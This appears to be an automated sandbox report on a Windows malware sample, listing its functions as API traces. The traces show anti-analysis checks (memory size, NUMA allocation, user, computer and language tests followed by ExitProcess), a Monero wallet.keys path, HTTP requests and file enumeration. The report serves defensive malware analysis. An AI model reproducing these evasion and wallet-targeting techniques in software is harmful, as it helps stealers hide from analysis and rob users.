                            • Part of subcall function 00541160: ExitProcess.KERNEL32 ref: 0054117E
                            • Part of subcall function 00541110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                            • Part of subcall function 00541110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                            • Part of subcall function 00541110: ExitProcess.KERNEL32 ref: 00541143
                            • Part of subcall function 00541220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                            • Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541258
                            • Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541266
                            • Part of subcall function 00541220: ExitProcess.KERNEL32 ref: 00541294
                            • Part of subcall function 00556770: GetUserDefaultLangID.KERNEL32 ref: 00556774
                            • Part of subcall function 00541190: ExitProcess.KERNEL32 ref: 005411C6
                            • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                            • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                            • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                            • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                            • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                            • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                          • Sleep.KERNEL32(00001770), ref: 00556B04
                          • CloseHandle.KERNEL32(?,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                          • ExitProcess.KERNEL32 ref: 00556B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                          • Instruction ID: 6497a6133172337643a503fd40492882b901ac90d3a50e916afcc4b435b2b13e
                          • Opcode Fuzzy Hash: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                          • Instruction Fuzzy Hash: EE31527094010AAADB04F7F0DC6EBEE7F78BF84342F50461AF902A2181EF746509C7A6
                          Function 00541220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 541220-541247 call 5589b0 GlobalMemoryStatusEx 1439 541273-54127a 1436->1439 1440 541249-541271 call 55da00 * 2 1436->1440 1442 541281-541285 1439->1442 1440->1442 1444 541287 1442->1444 1445 54129a-54129d 1442->1445 1447 541292-541294 ExitProcess 1444->1447 1448 541289-541290 1444->1448 1448->1445 1448->1447
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                          • __aulldiv.LIBCMT ref: 00541258
                          • __aulldiv.LIBCMT ref: 00541266
                          • ExitProcess.KERNEL32 ref: 00541294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                          • Instruction ID: 0dbb06116785e83c430c4a204ab77aa88386feadc157b5320cfcc0780325ca52
                          • Opcode Fuzzy Hash: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                          • Instruction Fuzzy Hash: 20014FB0948308BAEB10DBD0CC49B9EBB78BB44705F208055E705F6180D7B46585875D
                          Function 00556AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1450 556af3 1451 556b0a 1450->1451 1453 556b0c-556b22 call 556920 call 555b10 CloseHandle ExitProcess 1451->1453 1454 556aba-556ad7 call 55aad0 OpenEventA 1451->1454 1459 556af5-556b04 CloseHandle Sleep 1454->1459 1460 556ad9-556af1 call 55aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                          • Sleep.KERNEL32(00001770), ref: 00556B04
                          • CloseHandle.KERNEL32(?,00000000,?,01238928,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                          • ExitProcess.KERNEL32 ref: 00556B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                          • Instruction ID: 6832f25de47d9b0ab20a7ceae4a5ab06024d8dad58e542e5f6e24febdfe2fbd0
                          • Opcode Fuzzy Hash: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                          • Instruction Fuzzy Hash: 4FF0307094024AAAF700ABA0DC2AB7D7E74FB04712F608917BD03A2191DBB46548D656
                          Function 005447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: a3208f523a7804ccbbcfc766ad330b2d21822bb2a0dfbcd8b441b99869676247
                          • Instruction ID: 6d6a1d04f2dde0397d92ba67d567f2eaeb3e4d5c0cb74bec4835e5c51c079b9a
                          • Opcode Fuzzy Hash: a3208f523a7804ccbbcfc766ad330b2d21822bb2a0dfbcd8b441b99869676247
                          • Instruction Fuzzy Hash: 8B211DB1D00209ABDF14DFA4E949ADD7B78FB45321F108226F925A72D0EB706A09CF91
                          Function 005551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                            • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546303
                            • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                            • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0123F440,00000000,00000000,00400100,00000000), ref: 00546385
                            • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                            • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                          • Instruction ID: e6d16ada3ff708b3ce11cb7c9bdf117ce77cad8381cca31ccfdf90c49b6b87bf
                          • Opcode Fuzzy Hash: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                          • Instruction Fuzzy Hash: 03111F30910449A7CB14FF70DD6AAED7B38BF90301F408655FC1A46592EF306B09CB91
                          Function 005578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                          • Instruction ID: af00ef862b9f4821313cfb74156a62dc8a62f7e4c2d6f27e3e4e0d1f47adc1bf
                          • Opcode Fuzzy Hash: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                          • Instruction Fuzzy Hash: 9D0162B1944208EBDB10DF94DD45FAAFBB8F704B21F10421AEA45E3280C37859048BB5
                          Function 00541110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                          • ExitProcess.KERNEL32 ref: 00541143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                          • Instruction ID: f3aa8f6f6cf297fe64ee3c59b72add0a5333aaa336e3f832f5311aad4c58ff13
                          • Opcode Fuzzy Hash: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                          • Instruction Fuzzy Hash: 30E0E670985308FBF710ABA19C0EB497A78AB04B45F204055F709761D0D6B92640979E
                          Function 005410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005410B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005410F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                          • Instruction ID: ad979e7d54e63171e9091120d29bd7897c341c9a54eab0ca3def99d3140d439e
                          • Opcode Fuzzy Hash: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                          • Instruction Fuzzy Hash: 5AF0E271681208BBE7149AA4AC5DFBABBE8E705B15F304449F904E3280D5719F40DBA8
                          Function 00541190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                            • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                            • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                            • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                            • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                            • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                          • ExitProcess.KERNEL32 ref: 005411C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                          • Instruction ID: b55363fb87426da481e92bb1159e7fbf36ff10ec0fb6d647fcb5b2724e286043
                          • Opcode Fuzzy Hash: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                          • Instruction Fuzzy Hash: 9CE0ECB595420663DA0073B0BC1EB2A3A9C7B5434AF144426BE0592502FE29E854866E

                          Non-executed Functions

                          Function 005538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 005538CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 005538E3
                          • lstrcat.KERNEL32(?,?), ref: 00553935
                          • StrCmpCA.SHLWAPI(?,00560F70), ref: 00553947
                          • StrCmpCA.SHLWAPI(?,00560F74), ref: 0055395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00553C67
                          • FindClose.KERNEL32(000000FF), ref: 00553C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
